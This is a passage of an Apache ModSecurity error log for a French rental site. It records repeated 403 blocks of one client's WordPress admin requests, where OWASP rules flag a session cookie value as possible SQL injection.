[Mon May 11 18:36:05.867793 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFdQ-Qm4vhlWBPlMjnagAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:06.486612 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFdQ-Qm4vhlWBPlMjnagAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:06.842258 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFdg-Qm4vhlWBPlMjnbAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:06.842577 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFdg-Qm4vhlWBPlMjnbAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:07.424656 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFdg-Qm4vhlWBPlMjnbAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:07.626367 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFdw-Qm4vhlWBPlMjnbgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:07.626651 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFdw-Qm4vhlWBPlMjnbgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:08.210691 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFdw-Qm4vhlWBPlMjnbgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:08.351335 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFeA-Qm4vhlWBPlMjnbwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:08.351676 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFeA-Qm4vhlWBPlMjnbwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:08.735178 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFeA-Qm4vhlWBPlMjnbwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:09.014577 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFeQ-Qm4vhlWBPlMjncQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:09.014862 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFeQ-Qm4vhlWBPlMjncQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:09.605503 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFeQ-Qm4vhlWBPlMjncQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:09.810945 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFeQ-Qm4vhlWBPlMjncgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:09.811250 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFeQ-Qm4vhlWBPlMjncgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:10.413818 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFeQ-Qm4vhlWBPlMjncgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:10.805047 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFeg-Qm4vhlWBPlMjndAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:10.805347 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFeg-Qm4vhlWBPlMjndAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:11.458652 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFeg-Qm4vhlWBPlMjndAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:11.738445 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFew-Qm4vhlWBPlMjndgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:11.738731 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFew-Qm4vhlWBPlMjndgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:12.346677 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFew-Qm4vhlWBPlMjndgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:12.452269 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFfA-Qm4vhlWBPlMjndwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:12.452636 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFfA-Qm4vhlWBPlMjndwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:13.021024 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFfA-Qm4vhlWBPlMjndwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:13.127176 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFfQ-Qm4vhlWBPlMjneQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:13.127559 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFfQ-Qm4vhlWBPlMjneQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:13.508640 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFfQ-Qm4vhlWBPlMjneQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:14.779242 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFfg-Qm4vhlWBPlMjnewAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:14.779542 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFfg-Qm4vhlWBPlMjnewAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:15.420463 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFfg-Qm4vhlWBPlMjnewAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:15.904098 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFfw-Qm4vhlWBPlMjnfQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:15.904397 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFfw-Qm4vhlWBPlMjnfQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:16.525880 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFfw-Qm4vhlWBPlMjnfQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:16.768601 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFgA-Qm4vhlWBPlMjnfgAAAAc"], referer: 